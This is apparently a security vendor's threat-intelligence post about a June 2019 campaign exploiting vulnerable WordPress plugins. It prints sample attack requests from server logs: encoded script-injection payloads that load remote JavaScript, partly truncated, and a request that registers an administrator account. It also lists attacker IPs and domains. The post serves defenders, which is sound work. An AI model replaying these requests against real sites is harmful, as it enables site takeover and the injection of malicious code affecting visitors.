Plugins Under Attack: June 2019

A long-lasting malware campaign (1,2) targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites.

As part of a strategy to rotate attack vectors and compromise as many sites as possible, we found a number of new plugins added to this campaign during this past month:

Plugins Under Attack

The plugins that are continuing to be leveraged and appear to be giving attackers the best results include:

Samples Attack Requests

WP-Piwik

45.67.228.17 - wp-piwik%5Btrack_mode%5D=manually&wp-piwik%5Btracking_code%5D=%3Cscript+type%3Dtext%2Fjavascript+async%3Dtrue%3Evar+nt+%3D+String.fromCharCode%2898%2C+98%2C+98%2C+55%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3B...skipped...%2Cn%29%3B%3C%2Fscript%3E [25/Jun/2019] "POST /wp-admin/admin-post.php HTTP/1.1"

Blog Designer

45.67.228.14 - action=save&custom_css=%3C%2Fstyle%3E%3Cscript+async%3Dtrue+type%3Dtext%2Fjavascript%3Evar+nt+%3D+String.fromCharCode%2898%2C+98%2C+98%2C+51%29%3Bvar+mb+%3D+String.fromChar...skipped...2C+114%2C+105%2C+112%2C+116%2C+38%2C+118%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Dlb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E&updated=true [25/Jun/2019] "POST /wp-admin/admin-ajax.php HTTP/1.1"

WP Support Plus Responsive Ticket System

91.121.54.71 - action=wpsp_upload_attachment [23/Jun/2019] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Convert Plus Plugin

68.183.131.57 - action=cp_add_subscriber&cp_set_user=administrator&cp_set_user=administrator&message=hello&message=letitbe&param%5Bemail%5D=workspace%40kleverandeverbever.top&param%5Bemail%5D=workspace%40kleverandeverbever.top [16/Jun/2019:02:37:42 +0000] "POST /wp-admin/admin-ajax.php?action=cp_add_subscriber HTTP/1.1"

Live Chat with Facebook Messenger

46.105.102.54 - domain=%3C%2Fscript%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+100%2C+61%2C+100%2C+111%2C+99%2C+117%2C+109%2C+101%2C+110%2C+116%2C+59%2C+118%2C+97%2C+114%2C+32%2C+115%2C+61%2C+100%2C+46%2C+99%2C+114%2C+101%2C+97%2C+116%2C+101%2C+69%2C+108%2C+101%2C+109%2C+101%2C+110%2C+116%2C+40%2C+39%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%2C+39%2C+41%2C+59%2C+32%2C+10%2C+115%2C+46%2C+116%2C+12...skipped...+101%2C+40%2C+39%2C+104%2C+101%2C+97%2C+100%2C+39%2C+41%2C+91%2C+48%2C+93%2C+46%2C+97%2C+112%2C+112%2C+101%2C+110%2C+100%2C+67%2C+104%2C+105%2C+108%2C+100%2C+40%2C+115%2C+41%2C+59%2C+10%2C+125%29%29%3B%3C%2Fscript%3E%3Cscript%3E [07/Jun/2019:14:01:05 +0000] "POST /wp-admin/admin-ajax.php?action=update_zb_fbc_code HTTP/1.1"

WP Quick Booking Manager

46.105.102.54 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+100%2C+61%2C+100%2C+111%2C+99%2C+117%2C+109%2C+101%2C+110%2C+116%2C+59%2C+118%2C+97%2C+114%2C+32%2C+115%2C+61%2C+100%2C+46%2C+99%2C+114%2C+101%2C+97%2C+116%2C+101%2C+69%2C+108%2C+101%2C+109%2C+101%2C+110%2C+116%2C+40%2C+39%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%2C+39%2C+41%2C+59%2C+32%2C+...skipped...5%2C+108%2C+100%2C+40%2C+115%2C+41%2C+59%2C+10%2C+125%29%29%3B%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [07/Jun/2019:14:01:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Post Custom Templates Lite

46.105.102.54 - otw_pctl_action=manage_otw_pctl_options&otw_pctl_custom_css=%3C%2Ftextarea%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+100%2C+61%2C+100%2C+111%2C+99%2C+117%2C+109%2C+101%2C+110%2C+116%2C+59%2C+118%2C+97%2C+114%2C+32%2C+115%2C+61%2C+100%2C+46%2C+99%2C+114%2C+101%2C+97%2C+116%2C+101%2C+69%2C+108%2C+...skipped...%2C+84%2C+97%2C+103%2C+78%2C+97%2C+109%2C+101%2C+40%2C+39%2C+104%2C+101%2C+97%2C+100%2C+39%2C+41%2C+91%2C+48%2C+93%2C+46%2C+97%2C+112%2C+112%2C+101%2C+110%2C+100%2C+67%2C+104%2C+105%2C+108%2C+100%2C+40%2C+115%2C+41%2C+59%2C+10%2C+125%29%29%3B%3C%2Fscript%3E [07/Jun/2019] "POST /wp-admin/admin-post.php HTTP/1.1"

Wp File Manager

79.116.192.67 - action=mk_check_filemanager_php_syntax [01/Jun/2019] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Malicious Domains and IPs

IPs

45.67.228.15
45.67.229.14
45.67.228.17
109.96.171.178
91.121.54.71
185.238.1.175
185.238.1.179
185.238.1.176
185.238.1.53
68.183.131.57
46.105.102.54
185.238.1.53
185.212.129.164
185.238.0.153
162.254.253.193
79.116.192.67

Domains

deliverygoodstrategy[.]com
letsmakesomechoice[.]com
garrygudini[.]com
kleverandeverbever[.]top

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

Plugins Under Attack: June 2019

Plugins Under Attack

Samples Attack Requests

Malicious Domains and IPs

John Castro

Related Tags

Secondtds.mooo[.]com .htaccess redirects

Spotlight: How iThemes Manages Their Website Security

osCommerce malware: Cannot redeclare corelibrarieshandler

Website Malware Removal – Blackhole Exploit

Magento Malware Emails Stolen Credit Card Details to Hackers

Neapolitan Backdoor Injection

Plugins Under Attack

Samples Attack Requests

Malicious Domains and IPs

John Castro

Related Tags

Related Categories

You May Also Like